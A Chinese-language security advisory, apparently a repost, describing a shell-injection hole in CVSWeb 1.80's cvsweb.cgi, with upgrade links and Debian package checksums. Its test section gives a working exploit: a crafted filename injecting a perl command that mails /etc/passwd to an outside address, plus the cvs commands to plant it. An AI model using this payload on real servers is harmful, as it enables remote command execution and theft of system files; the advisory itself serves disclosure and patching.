CVSWeb远程攻击漏洞精简版

安全 漏洞
此文章主要介绍的是CVSWeb远程攻击漏洞,其中包括有对受影响系统,不受影响系统,等相关内容的描述,以下就是文章的主要内容讲述。

此文章主要讲述的是CVSWeb远程攻击漏洞,我前两天在相关网站看见CVSWeb远程攻击漏洞的资料,觉得挺好,就拿出来供大家分享,以下就是文章的详细内容介绍,希望会给你带来一些帮助在此方面。

受影响系统:

 

CVSWeb Developer CVSWeb 1.80

不受影响系统:

CVSWeb Developer CVSWeb 1.89

CVSWeb Developer CVSWeb 1.86

描述:

Cvsweb 1.80包含一个安全远程攻击漏洞,如果攻击者对cvs库有写权限,他就可以远程获得对cvs server的

shell访问权限。出问题的代码在cvsweb.cgi中:

open($fh, "rlog '$filenames' 2>/dev/null |")

攻击者通过建立一个特殊的文件名,来发动攻击。

<* 来源: Wizdumb *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

攻击者会首先按照下列步骤操作:

SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"

touch $SHELLCODE

cvs add $SHELLCODE

cvs commit -m '' $SHELLCODE

然后攻击者会访问cvsweb页面,浏览他设置木马文件的目录。这将导致/etc/passwd 文件被

发送给攻击者,当然攻击者也可以执行其他的命令。

建议:

升级到1.86或者更高版本,下载地址:

http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/

[ Debian Linux ]

Debian GNU/Linux 2.1 alias slink

源码包:

http://security.debian.org/dists/stable/updates/source/cvsweb_109.dsc

MD5 checksum: b1810728310882fb72078674521ee369

http://security.debian.org/dists/stable/updates/source/cvsweb_109.tar.gz

MD5 checksum: 4c42ec3ba7248fc2499cdfaa6ae6b702

以上的相关内容就是对CVSWeb远程攻击漏洞的介绍,望你能有所收获。

 

【编辑推荐】

  1. 黑客远程攻击的手段解析
  2. 对黑客远程攻击的详细描述
  3. IE漏洞或导致远程攻击 微软专家解析如何防御
责任编辑:佚名 来源: 51CTO.com
相关推荐

2010-09-17 16:01:55

代码执行漏洞EXE文件

2010-09-17 17:41:54

2010-09-16 10:14:35

2010-06-12 17:12:21

PPPOE协议

2010-09-17 13:47:35

2010-05-20 14:46:34

2010-09-17 15:36:21

2011-09-02 13:38:56

PhoneGap插件Android

2010-09-17 17:14:48

手工添加

2010-09-17 16:31:02

2010-02-02 14:13:31

VMware Tool

2011-03-31 10:21:52

CentosCactishell

2010-09-16 16:12:24

2010-09-15 14:28:06

2023-03-10 10:47:06

Xubuntu发行版

2024-10-14 13:07:40

Spring框架Boot

2010-09-17 12:40:58

2020-12-27 10:57:30

QQ谷歌 Play移动应用

2018-09-30 11:50:13

微软 Windows Microsoft

2021-01-29 14:18:02

谷歌AndroidMicroDroid
点赞
收藏

51CTO技术栈公众号